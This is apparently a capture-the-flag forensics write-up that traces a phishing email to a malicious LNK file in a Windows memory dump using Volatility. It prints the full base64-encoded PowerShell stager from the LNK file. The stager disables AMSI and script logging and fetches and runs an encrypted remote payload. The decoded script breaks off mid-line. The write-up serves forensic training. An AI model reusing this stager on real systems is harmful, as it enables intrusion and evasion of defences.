Suspicious traffic was detected from a recruiter’s virtual PC. A memory dump of the offending VM was captured before it was removed from the network for imaging and analysis. Our recruiter mentioned he received an email from someone regarding their resume. A copy of the email was recovered and is provided for reference. Find and decode the source of the malware to find the flag.<\/p>\n\n\n\n
After downloading and unzipping the file I noticed “Resume.eml”. Obviously, I viewed this straight away for details.<\/p>\n\n\n\n
Return-Path: <bloodworm@madlab.lcl>\nDelivered-To: madlab.lcl-flounder@madlab.lcl\nReceived: (qmail 2609 invoked by uid 105); 3 Oct 2017 02:30:24 -0000\nMIME-Version: 1.0\nContent-Type: multipart\/alternative;\n boundary=\"=_a8ebc8b42c157d88c1096632aeae0559\"\nDate: Mon, 02 Oct 2017 22:30:24 -0400\nFrom: Brian Loodworm <bloodworm@madlab.lcl>\nTo: flounder@madlab.lcl\nSubject: Resume\nOrganization: HackTheBox\nMessage-ID: <add77ed2ac38c3ab639246956c25b2c2@madlab.lcl>\nX-Sender: bloodworm@madlab.lcl\nReceived: from mail.madlab.lcl (HELO mail.madlab.lcl) (127.0.0.1)\n by mail.madlab.lcl (qpsmtpd\/0.96) with ESMTPSA (ECDHE-RSA-AES256-GCM-SHA384 encrypted); Mon, 02 Oct 2017 22:30:24 -0400\n\n--=_a8ebc8b42c157d88c1096632aeae0559\nContent-Transfer-Encoding: 7bit\nContent-Type: text\/plain; charset=US-ASCII\n\nHi Frank, someone told me you would be great to review my resume..\nCould you have a look?\n\nresume.zip [1] \n\nLinks:\n------\n[1] http:\/\/10.10.99.55:8080\/resume.zip\n--=_a8ebc8b42c157d88c1096632aeae0559\nContent-Transfer-Encoding: quoted-printable\nContent-Type: text\/html; charset=UTF-8\n\n<html><head><meta http-equiv=3D\"Content-Type\" content=3D\"text\/html; charset=\n=3DUTF-8\" \/><\/head><body style=3D'font-size: 10pt; font-family: Verdana,Gen=\neva,sans-serif'>\n<div class=3D\"pre\" style=3D\"margin: 0; padding: 0; font-family: monospace\">=\n<br \/> Hi Frank, someone told me you would be great to review my resume.. c=\nuold you have a look?<br \/> <br \/><a href=3D\"http:\/\/10.10.99.55:8080\/resume=\n=2Ezip\">resume.zip<\/a><\/div>\n<\/body><\/html>\n\n--=_a8ebc8b42c157d88c1096632aeae0559--<\/pre>\n\n\n\nI instantly assumed a scam email and jumped into volatility to find the file.<\/p>\n\n\n\n
vol -f flounder-pc-memdump.elf windows.filescan | grep resume\n\n0x1e1f6200 \\Users\\user\\Desktop\\resume.pdf.lnk\t216\n0x1e8feb70\t\\Users\\user\\Desktop\\resume.pdf.lnk\t216<\/pre>\n\n\n\nNow that I have found the malicious file, it’s time to dump its contents.<\/p>\n\n\n\n
vol -f flounder-pc-memdump.elf windows.dumpfiles --physaddr 0x1e8feb70\nVolatility 3 Framework 1.0.1\nProgress: 100.00\t\tPDB scanning finished \nCache\tFileObject\tFileName\tResult\n\nDataSectionObject\t0x1e8feb70\tresume.pdf.lnk\tfile.0x1e8feb70.0xfa80022ac740.DataSectionObject.resume.pdf.lnk.dat\nSharedCacheMap\t0x1e8feb70\tresume.pdf.lnk\tfile.0x1e8feb70.0xfa80017dcc60.SharedCacheMap.resume.pdf.lnk.vacb\n\n\n\nstrings file.0x1e8feb70.0xfa80017dcc60.SharedCacheMap.resume.pdf.lnk.vacb \n\/C:\\\nDKfp\nWindows\nDKfp*\nSystem32\nWINDOW~1\nv1.0\nKV}*\npowershell.exe\nK6}*\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\n%SystemRoot%\\system32\\SHELL32.dll\n1SPS\ncABvAHcAZQByAHMAaABlAGwAbAAgAC0AbgBvAFAAIAAtAHMAdABhACAALQB3ACAAMQAgAC0AZQBuAGMAIAAgAEoAQQBCAEgAQQBIAEkAQQBiAHcAQgBWAEEARgBBAEEAVQBBAEIAUABBAEUAdwBBAGEAUQBCAEQAQQBGAGsAQQBVAHcAQgBGAEEASABRAEEAZABBAEIASgBBAEUANABBAFIAdwBCAHoAQQBDAEEAQQBQAFEAQQBnAEEARgBzAEEAYwBnAEIARgBBAEUAWQBBAFgAUQBBAHUAQQBFAEUAQQBVAHcAQgB6AEEARwBVAEEAVABRAEIAQwBBAEUAdwBBAFcAUQBBAHUAQQBFAGMAQQBSAFEAQgAwAEEARgBRAEEAZQBRAEIAdwBBAEUAVQBBAEsAQQBBAG4AQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFQAUQBCAGgAQQBHADQAQQBZAFEAQgBuAEEARwBVAEEAYgBRAEIAbABBAEcANABBAGQAQQBBAHUAQQBFAEUAQQBkAFEAQgAwAEEARwA4AEEAYgBRAEIAaABBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBMAGcAQgBWAEEASABRAEEAYQBRAEIAcwBBAEgATQBBAEoAdwBBAHAAQQBDADQAQQBJAGcAQgBIAEEARQBVAEEAZABBAEIARwBBAEUAawBBAFIAUQBCAGcAQQBHAHcAQQBaAEEAQQBpAEEAQwBnAEEASgB3AEIAagBBAEcARQBBAFkAdwBCAG8AQQBHAFUAQQBaAEEAQgBIAEEASABJAEEAYgB3AEIAMQBBAEgAQQBBAFUAQQBCAHYAQQBHAHcAQQBhAFEAQgBqAEEASABrAEEAVQB3AEIAbABBAEgAUQBBAGQAQQBCAHAAQQBHADQAQQBaAHcAQgB6AEEAQwBjAEEATABBAEEAZwBBAEMAYwBBAFQAZwBBAG4AQQBDAHMAQQBKAHcAQgB2AEEARwA0AEEAVQBBAEIAMQBBAEcASQBBAGIAQQBCAHAAQQBHAE0AQQBMAEEAQgBUAEEASABRAEEAWQBRAEIAMABBAEcAawBBAFkAdwBBAG4AQQBDAGsAQQBMAGcAQgBIAEEARQBVAEEAVgBBAEIAVwBBAEcARQBBAGIAQQBCAFYAQQBHAFUAQQBLAEEAQQBrAEEARwA0AEEAZABRAEIAcwBBAEUAdwBBAEsAUQBBADcAQQBDAFEAQQBSAHcAQgBTAEEARwA4AEEAZABRAEIAUQBBAEYAQQBBAFQAdwBCAHMAQQBFAGsAQQBRAHcAQgA1AEEARgBNAEEAWgBRAEIAVQBBAEYAUQBBAGEAUQBCAE8AQQBHAGMAQQBVAHcAQgBiAEEAQwBjAEEAVQB3AEIAagBBAEgASQBBAGEAUQBCAHcAQQBIAFEAQQBRAGcAQQBuAEEAQwBzAEEASgB3AEIAcwBBAEcAOABBAFkAdwBCAHIAQQBFAHcAQQBiAHcAQgBuAEEARwBjAEEAYQBRAEIAdQBBAEcAYwBBAEoAdwBCAGQAQQBGAHMAQQBKAHcAQgBGAEEARwA0AEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBCAFQAQQBHAE0AQQBjAGcAQgBwAEEASABBAEEAZABBAEIAQwBBAEMAYwBBAEsAdwBBAG4AQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAVABBAEIAdgBBAEcAYwBBAFoAdwBCAHAAQQBHADQAQQBaAHcAQQBuAEEARgAwAEEASQBBAEEAOQBBAEMAQQBBAE0AQQBBADcAQQBDAFEAQQBSAHcAQgBTAEEARwA4AEEAZABRAEIAUQBBAEYAQQBBAFQAdwBCAE0AQQBFAGsAQQBRAHcAQgBaAEEARgBNAEEAUgBRAEIAMABBAEYAUQBBAGEAUQBCAHUAQQBHAGMAQQBVAHcAQgBiAEEAQwBjAEEAVQB3AEIAagBBAEgASQBBAGEAUQBCAHcAQQBIAFEAQQBRAGcAQQBuAEEAQwBzAEEASgB3AEIAcwBBAEcAOABBAFkAdwBCAHIAQQBFAHcAQQBiAHcAQgBuAEEARwBjAEEAYQBRAEIAdQBBAEcAYwBBAEoAdwBCAGQAQQBGAHMAQQBKAHcAQgBGAEEARwA0AEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBCAFQAQQBHAE0AQQBjAGcAQgBwAEEASABBAEEAZABBAEIAQwBBAEcAdwBBAGIAdwBCAGoAQQBHAHMAQQBTAFEAQgB1AEEASABZAEEAYgB3AEIAagBBAEcARQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgBNAEEARwA4AEEAWgB3AEIAbgBBAEcAawBBAGIAZwBCAG4AQQBDAGMAQQBYAFEAQQBnAEEARAAwAEEASQBBAEEAdwBBAEQAcwBBAFcAdwBCAFMAQQBHAFUAQQBaAGcAQgBkAEEAQwA0AEEAUQBRAEIAegBBAEYATQBBAFoAUQBCAHQAQQBFAEkAQQBiAEEAQgA1AEEAQwA0AEEAUgB3AEIAbABBAEYAUQBBAFYAQQBCADUAQQBGAEEAQQBSAFEAQQBvAEEAQwBjAEEAVQB3AEIANQBBAEgATQBBAGQAQQBCAGwAQQBHADAAQQBMAGcAQgBOAEEARwBFAEEAYgBnAEIAaABBAEcAYwBBAFoAUQBCAHQAQQBHAFUAQQBiAGcAQgAwAEEAQwA0AEEAUQBRAEIAMQBBAEgAUQBBAGIAdwBCAHQAQQBHAEUAQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAdQBBAEUARQBBAGIAUQBCAHoAQQBHAGsAQQBWAFEAQgAwAEEARwBrAEEAYgBBAEIAegBBAEMAYwBBAEsAUQBCADgAQQBEADgAQQBlAHcAQQBrAEEARgA4AEEAZgBRAEIAOABBAEMAVQBBAGUAdwBBAGsAQQBGADgAQQBMAGcAQgBIAEEARQBVAEEAZABBAEIARwBBAEcAawBBAFoAUQBCAE0AQQBHAFEAQQBLAEEAQQBuAEEARwBFAEEAYgBRAEIAegBBAEcAawBBAFMAUQBCAHUAQQBHAGsAQQBkAEEAQgBHAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAG4AQQBDAHcAQQBKAHcAQgBPAEEARwA4AEEAYgBnAEIAUQBBAEgAVQBBAFkAZwBCAHMAQQBHAGsAQQBZAHcAQQBzAEEARgBNAEEAZABBAEIAaABBAEgAUQBBAGEAUQBCAGoAQQBDAGMAQQBLAFEAQQB1AEEARgBNAEEAUgBRAEIAVQBBAEYAWQBBAFkAUQBCAE0AQQBIAFUAQQBSAFEAQQBvAEEAQwBRAEEAVABnAEIAMQBBAEcAdwBBAFQAQQBBAHMAQQBDAFEAQQBWAEEAQgB5AEEASABVAEEAWgBRAEEAcABBAEgAMABBAE8AdwBCAGIAQQBGAE0AQQBlAFEAQgB6AEEARgBRAEEAWgBRAEIAdABBAEMANABBAFQAZwBCAGwAQQBGAFEAQQBMAGcAQgBUAEEARQBVAEEAYwBnAEIAVwBBAEUAawBBAFkAdwBCAGwAQQBGAEEAQQBUAHcAQgBKAEEARwA0AEEAZABBAEIATgBBAEUARQBBAGIAZwBCAEIAQQBHAGMAQQBSAFEAQgBTAEEARgAwAEEATwBnAEEANgBBAEUAVQBBAGUAQQBCAHcAQQBFAFUAQQBZAHcAQgAwAEEARABFAEEATQBBAEEAdwBBAEUATQBBAFQAdwBCAHUAQQBGAFEAQQBhAFEAQgB1AEEASABVAEEAUgBRAEEAOQBBAEQAQQBBAE8AdwBBAGsAQQBGAGMAQQBRAHcAQQA5AEEARQA0AEEAUgBRAEIAWABBAEMAMABBAFQAdwBCAEMAQQBHAG8AQQBSAFEAQgBqAEEARgBRAEEASQBBAEIAVABBAEgAawBBAGMAdwBCAFUAQQBFAFUAQQBUAFEAQQB1AEEARQA0AEEAUgBRAEIAMABBAEMANABBAFYAdwBCAGwAQQBFAEkAQQBRAHcAQgBzAEEARQBrAEEAUgBRAEIAdQBBAEgAUQBBAE8AdwBBAGsAQQBIAFUAQQBQAFEAQQBuAEEARQAwAEEAYgB3AEIANgBBAEcAawBBAGIAQQBCAHMAQQBHAEUAQQBMAHcAQQAxAEEAQwA0AEEATQBBAEEAZwBBAEMAZwBBAFYAdwBCAHAAQQBHADQAQQBaAEEAQgB2AEEASABjAEEAYwB3AEEAZwBBAEUANABBAFYAQQBBAGcAQQBEAFkAQQBMAGcAQQB4AEEARABzAEEASQBBAEIAWABBAEUAOABBAFYAdwBBADIAQQBEAFEAQQBPAHcAQQBnAEEARgBRAEEAYwBnAEIAcABBAEcAUQBBAFoAUQBCAHUAQQBIAFEAQQBMAHcAQQAzAEEAQwA0AEEATQBBAEEANwBBAEMAQQBBAGMAZwBCADIAQQBEAG8AQQBNAFEAQQB4AEEAQwA0AEEATQBBAEEAcABBAEMAQQBBAGIAQQBCAHAAQQBHAHMAQQBaAFEAQQBnAEEARQBjAEEAWgBRAEIAagBBAEcAcwBBAGIAdwBBAG4AQQBEAHMAQQBKAEEAQgAzAEEARQBNAEEATABnAEIASQBBAEcAVQBBAFkAUQBCAEUAQQBHAFUAQQBjAGcAQgBUAEEAQwA0AEEAUQBRAEIAawBBAEcAUQBBAEsAQQBBAG4AQQBGAFUAQQBjAHcAQgBsAEEASABJAEEATABRAEIAQgBBAEcAYwBBAFoAUQBCAHUAQQBIAFEAQQBKAHcAQQBzAEEAQwBRAEEAZABRAEEAcABBAEQAcwBBAEoAQQBCAFgAQQBHAE0AQQBMAGcAQgBRAEEARgBJAEEAYgB3AEIAWQBBAEgAawBBAFAAUQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEARgBRAEEAWgBRAEIATgBBAEMANABBAFQAZwBCAEYAQQBGAFEAQQBMAGcAQgBYAEEARwBVAEEAWQBnAEIAUwBBAEcAVQBBAGMAUQBCADEAQQBFAFUAQQBjAHcAQgAwAEEARgAwAEEATwBnAEEANgBBAEUAUQBBAFoAUQBCAG0AQQBHAEUAQQBWAFEAQgBNAEEASABRAEEAVgB3AEIAbABBAEUASQBBAFUAQQBCAFMAQQBFADgAQQBXAEEAQgBaAEEARABzAEEASgBBAEIAMwBBAEUATQBBAEwAZwBCAFEAQQBGAEkAQQBiAHcAQgBZAEEARgBrAEEATABnAEIARABBAEYASQBBAFIAUQBCAEUAQQBHAFUAQQBUAGcAQgAwAEEARQBrAEEAWQBRAEIATQBBAEYATQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARgBrAEEAVQB3AEIAVQBBAEcAVQBBAFQAUQBBAHUAQQBFADQAQQBSAFEAQgBVAEEAQwA0AEEAUQB3AEIAeQBBAEcAVQBBAFIAQQBCAEYAQQBHADQAQQBWAEEAQgBwAEEARwBFAEEAVABBAEIARABBAEcARQBBAFEAdwBCAG8AQQBHAFUAQQBYAFEAQQA2AEEARABvAEEAUgBBAEIAbABBAEUAWQBBAFkAUQBCADEAQQBFAHcAQQBWAEEAQgBPAEEARQBVAEEAZABBAEIAMwBBAEUAOABBAGMAZwBCAHIAQQBFAE0AQQBjAGcAQgBsAEEARwBRAEEAWgBRAEIAdQBBAEgAUQBBAGEAUQBCAEIAQQBHAHcAQQBVAHcAQQA3AEEAQwBRAEEAUwB3AEEAOQBBAEYAcwBBAFUAdwBCAFoAQQBGAE0AQQBkAEEAQgBGAEEARQAwAEEATABnAEIAVQBBAEcAVQBBAGUAQQBCADAAQQBDADQAQQBSAFEAQgBPAEEARQBNAEEAVAB3AEIARQBBAEUAawBBAGIAZwBCAG4AQQBGADAAQQBPAGcAQQA2AEEARQBFAEEAVQB3AEIARABBAEUAawBBAFMAUQBBAHUAQQBFAGMAQQBSAFEAQgAwAEEARQBJAEEAZQBRAEIAMABBAEUAVQBBAGMAdwBBAG8AQQBDAGMAQQBSAFEAQQB4AEEARwBjAEEAVABRAEIASABBAEcAUQBBAFoAZwBCAFUAQQBFAEEAQQBaAFEAQgB2AEEARQA0AEEAUABnAEIANABBAEQAawBBAGUAdwBCAGQAQQBEAEkAQQBSAGcAQQAzAEEAQwBzAEEAWQBnAEIAegBBAEUAOABBAGIAZwBBADAAQQBDADgAQQBVAHcAQgBwAEEARgBFAEEAYwBnAEIAMwBBAEMAYwBBAEsAUQBBADcAQQBDAFEAQQBVAGcAQQA5AEEASABzAEEASgBBAEIARQBBAEMAdwBBAEoAQQBCAEwAQQBEADAAQQBKAEEAQgBCAEEASABJAEEAWgB3AEIAVABBAEQAcwBBAEoAQQBCAFQAQQBEADAAQQBNAEEAQQB1AEEAQwA0AEEATQBnAEEAMQBBAEQAVQBBAE8AdwBBAHcAQQBDADQAQQBMAGcAQQB5AEEARABVAEEATgBRAEIAOABBAEMAVQBBAGUAdwBBAGsAQQBFAG8AQQBQAFEAQQBvAEEAQwBRAEEAUwBnAEEAcgBBAEMAUQBBAFUAdwBCAGIAQQBDAFEAQQBYAHcAQgBkAEEAQwBzAEEASgBBAEIATABBAEYAcwBBAEoAQQBCAGYAQQBDAFUAQQBKAEEAQgBMAEEAQwA0AEEAUQB3AEIAdgBBAEgAVQBBAGIAZwBCAFUAQQBGADAAQQBLAFEAQQBsAEEARABJAEEATgBRAEEAMgBBAEQAcwBBAEoAQQBCAFQAQQBGAHMAQQBKAEEAQgBmAEEARgAwAEEATABBAEEAawBBAEYATQBBAFcAdwBBAGsAQQBFAG8AQQBYAFEAQQA5AEEAQwBRAEEAVQB3AEIAYgBBAEMAUQBBAFMAZwBCAGQAQQBDAHcAQQBKAEEAQgBUAEEARgBzAEEASgBBAEIAZgBBAEYAMABBAGYAUQBBADcAQQBDAFEAQQBSAEEAQgA4AEEAQwBVAEEAZQB3AEEAawBBAEUAawBBAFAAUQBBAG8AQQBDAFEAQQBTAFEAQQByAEEARABFAEEASwBRAEEAbABBAEQASQBBAE4AUQBBADIAQQBEAHMAQQBKAEEAQgBJAEEARAAwAEEASwBBAEEAawBBAEUAZwBBAEsAdwBBAGsAQQBGAE0AQQBXAHcAQQBrAEEARQBrAEEAWABRAEEAcABBAEMAVQBBAE0AZwBBADEAQQBEAFkAQQBPAHcAQQBrAEEARgBNAEEAVwB3AEEAawBBAEUAawBBAFgAUQBBAHMAQQBDAFEAQQBVAHcAQgBiAEEAQwBRAEEAUwBBAEIAZABBAEQAMABBAEoAQQBCAFQAQQBGAHMAQQBKAEEAQgBJAEEARgAwAEEATABBAEEAawBBAEYATQBBAFcAdwBBAGsAQQBFAGsAQQBYAFEAQQA3AEEAQwBRAEEAWAB3AEEAdABBAEcASQBBAGUAQQBCAHYAQQBGAEkAQQBKAEEAQgBUAEEARgBzAEEASwBBAEEAawBBAEYATQBBAFcAdwBBAGsAQQBFAGsAQQBYAFEAQQByAEEAQwBRAEEAVQB3AEIAYgBBAEMAUQBBAFMAQQBCAGQAQQBDAGsAQQBKAFEAQQB5AEEARABVAEEATgBnAEIAZABBAEgAMABBAGYAUQBBADcAQQBDAFEAQQBkAHcAQgBqAEEAQwA0AEEAUwBBAEIARgBBAEUARQBBAFoAQQBCAEYAQQBIAEkAQQBjAHcAQQB1AEEARQBFAEEAUgBBAEIARQBBAEMAZwBBAEkAZwBCAEQAQQBHADgAQQBiAHcAQgByAEEARwBrAEEAWgBRAEEAaQBBAEMAdwBBAEkAZwBCAHoAQQBHAFUAQQBjAHcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEQAMABBAFQAUQBCAEQAQQBHAEUAQQBhAEEAQgAxAEEARgBFAEEAVgBnAEIAbQBBAEgAbwBBAE0AQQBCADUAQQBFADAAQQBOAGcAQgBXAEEARQBJAEEAWgBRAEEANABBAEcAWQBBAGUAZwBCAFcAQQBEAGsAQQBkAEEAQQA1AEEARwBvAEEAYgB3AEIAdABBAEcAOABBAFAAUQBBAGkAQQBDAGsAQQBPAHcAQQBrAEEASABNAEEAWgBRAEIAeQBBAEQAMABBAEoAdwBCAG8AQQBIAFEAQQBkAEEAQgB3AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AQQBBAHUAQQBEAEUAQQBNAEEAQQB1AEEARABrAEEATwBRAEEAdQBBAEQAVQBBAE4AUQBBADYAQQBEAGcAQQBNAEEAQQBuAEEARABzAEEASgBBAEIAMABBAEQAMABBAEoAdwBBAHYAQQBHAHcAQQBiAHcAQgBuAEEARwBrAEEAYgBnAEEAdgBBAEgAQQBBAGMAZwBCAHYAQQBHAE0AQQBaAFEAQgB6AEEASABNAEEATABnAEIAdwBBAEcAZwBBAGMAQQBBAG4AQQBEAHMAQQBKAEEAQgBtAEEARwB3AEEAWQBRAEIAbgBBAEQAMABBAEoAdwBCAEkAQQBGAFEAQQBRAGcAQgA3AEEAQwBRAEEAWAB3AEIAcQBBAEQAQQBBAFIAdwBCAGYAQQBIAGsAQQBNAEEAQgAxAEEARgBJAEEAWAB3AEIATgBBAEQATQBBAGIAUQBBAHcAQQBIAEkAQQBXAFEAQgBmAEEAQwBRAEEAZgBRAEEAbgBBAEQAcwBBAEoAQQBCAEUAQQBHAEUAQQBkAEEAQgBCAEEARAAwAEEASgBBAEIAWABBAEUATQBBAEwAZwBCAEUAQQBHADgAQQBWAHcAQgBPAEEARQB3AEEAYgB3AEIAaABBAEUAUQBBAFIAQQBCAEIAQQBGAFEAQQBRAFEAQQBvAEEAQwBRAEEAVQB3AEIAbABBAEYASQBBAEsAdwBBAGsAQQBIAFEAQQBLAFEAQQA3AEEAQwBRAEEAYQBRAEIAMgBBAEQAMABBAEoAQQBCAGsAQQBHAEUAQQBWAEEAQgBCAEEARgBzAEEATQBBAEEAdQBBAEMANABBAE0AdwBCAGQAQQBEAHMAQQBKAEEAQgBFAEEARQBFAEEAZABBAEIAaABBAEQAMABBAEoAQQBCAEUAQQBHAEUAQQBWAEEAQgBoAEEARgBzAEEATgBBAEEAdQBBAEMANABBAEoAQQBCAEUAQQBFAEUAQQBkAEEAQgBoAEEAQwA0AEEAVABBAEIAbABBAEcANABBAFIAdwBCAFUAQQBFAGcAQQBYAFEAQQA3AEEAQwAwAEEAUwBnAEIAUABBAEUAawBBAFQAZwBCAGIAQQBFAE0AQQBTAEEAQgBCAEEASABJAEEAVwB3AEIAZABBAEYAMABBAEsAQQBBAG0AQQBDAEEAQQBKAEEAQgBTAEEAQwBBAEEASgBBAEIAawBBAEcARQBBAGQAQQBCAEIAQQBDAEEAQQBLAEEAQQBrAEEARQBrAEEAVgBnAEEAcgBBAEMAUQBBAFMAdwBBAHAAQQBDAGsAQQBmAEEAQgBKAEEARQBVAEEAVwBBAEEAPQA=<\/pre>\n\n\n\nIt seems the contents have PowerShell execution with an encoded base64 string, which after decoding presented<\/p>\n\n\n\n
powershell -noP -sta -w 1 -enc JABHAHIAbwBVAFAAUABPAEwAaQBDAFkAUwBFAHQAdABJAE4ARwBzACAAPQAgAFsAcgBFAEYAXQAuAEEAUwBzAGUATQBCAEwAWQAuAEcARQB0AFQAeQBwAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAEkARQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAgACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBHAEUAVABWAGEAbABVAGUAKAAkAG4AdQBsAEwAKQA7ACQARwBSAG8AdQBQAFAATwBsAEkAQwB5AFMAZQBUAFQAaQBOAGcAUwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AIAA9ACAAMAA7ACQARwBSAG8AdQBQAFAATwBMAEkAQwBZAFMARQB0AFQAaQBuAGcAUwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQAgAD0AIAAwADsAWwBSAGUAZgBdAC4AQQBzAFMAZQBtAEIAbAB5AC4ARwBlAFQAVAB5AFAARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAEUAdABGAGkAZQBMAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMARQBUAFYAYQBMAHUARQAoACQATgB1AGwATAAsACQAVAByAHUAZQApAH0AOwBbAFMAeQBzAFQAZQBtAC4ATgBlAFQALgBTAEUAcgBWAEkAYwBlAFAATwBJAG4AdABNAEEAbgBBAGcARQBSAF0AOgA6AEUAeABwAEUAYwB0ADEAMAAwAEMATwBuAFQAaQBuAHUARQA9ADAAOwAkAFcAQwA9AE4ARQBXAC0ATwBCAGoARQBjAFQAIABTAHkAcwBUAEUATQAuAE4ARQB0AC4AVwBlAEIAQwBsAEkARQBuAHQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJAB3AEMALgBIAGUAYQBEAGUAcgBTAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJABXAGMALgBQAFIAbwBYAHkAPQBbAFMAeQBzAFQAZQBNAC4ATgBFAFQALgBXAGUAYgBSAGUAcQB1AEUAcwB0AF0AOgA6AEQAZQBmAGEAVQBMAHQAVwBlAEIAUABSAE8AWABZADsAJAB3AEMALgBQAFIAbwBYAFkALgBDAFIARQBEAGUATgB0AEkAYQBMAFMAIAA9ACAAWwBTAFkAUwBUAGUATQAuAE4ARQBUAC4AQwByAGUARABFAG4AVABpAGEATABDAGEAQwBoAGUAXQA6ADoARABlAEYAYQB1AEwAVABOAEUAdAB3AE8AcgBrAEMAcgBlAGQAZQBuAHQAaQBBAGwAUwA7ACQASwA9AFsAUwBZAFMAdABFAE0ALgBUAGUAeAB0AC4ARQBOAEMATwBEAEkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcARQB0AEIAeQB0AEUAcwAoACcARQAxAGcATQBHAGQAZgBUAEAAZQBvAE4APgB4ADkAewBdADIARgA3ACsAYgBzAE8AbgA0AC8AUwBpAFEAcgB3ACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIAZwBTADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAHUAbgBUAF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABvAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAdwBjAC4ASABFAEEAZABFAHIAcwAuAEEARABEACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0ATQBDAGEAaAB1AFEAVgBmAHoAMAB5AE0ANgBWAEIAZQA4AGYAegBWADkAdAA5AGoAbwBtAG8APQAiACkAOwAkAHMAZQByAD0AJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADkAOQAuADUANQA6ADgAMAAnADsAJAB0AD0AJwAvAGwAbwBnAGkAbgAvAHAAcgBvAGMAZQBzAHMALgBwAGgAcAAnADsAJABmAGwAYQBnAD0AJwBIAFQAQgB7ACQAXwBqADAARwBfAHkAMAB1AFIAXwBNADMAbQAwAHIAWQBfACQAfQAnADsAJABEAGEAdABBAD0AJABXAEMALgBEAG8AVwBOAEwAbwBhAEQARABBAFQAQQAoACQAUwBlAFIAKwAkAHQAKQA7ACQAaQB2AD0AJABkAGEAVABBAFsAMAAuAC4AMwBdADsAJABEAEEAdABhAD0AJABEAGEAVABhAFsANAAuAC4AJABEAEEAdABhAC4ATABlAG4ARwBUAEgAXQA7AC0ASgBPAEkATgBbAEMASABBAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAdABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=<\/pre>\n\n\n\nSo let’s go again<\/p>\n\n\n\n
$GroUPPOLiCYSEttINGs = [rEF].ASseMBLY.GEtTypE('System.Management.Automation.Utils').\"GEtFIE`ld\"('cachedGroupPolicySettings', 'N'+'onPublic,Static').GETValUe($nulL);$GRouPPOlICySeTTiNgS['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;$GRouPPOLICYSEtTingS['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;[Ref].AsSemBly.GeTTyPE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GEtFieLd('amsiInitFailed','NonPublic,Static').SETVaLuE($NulL,$True)};[SysTem.NeT.SErVIcePOIntMAnAgER]::ExpEct100COnTinuE=0;$WC=NEW-OBjEcT SysTEM.NEt.WeBClIEnt;$u='Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like 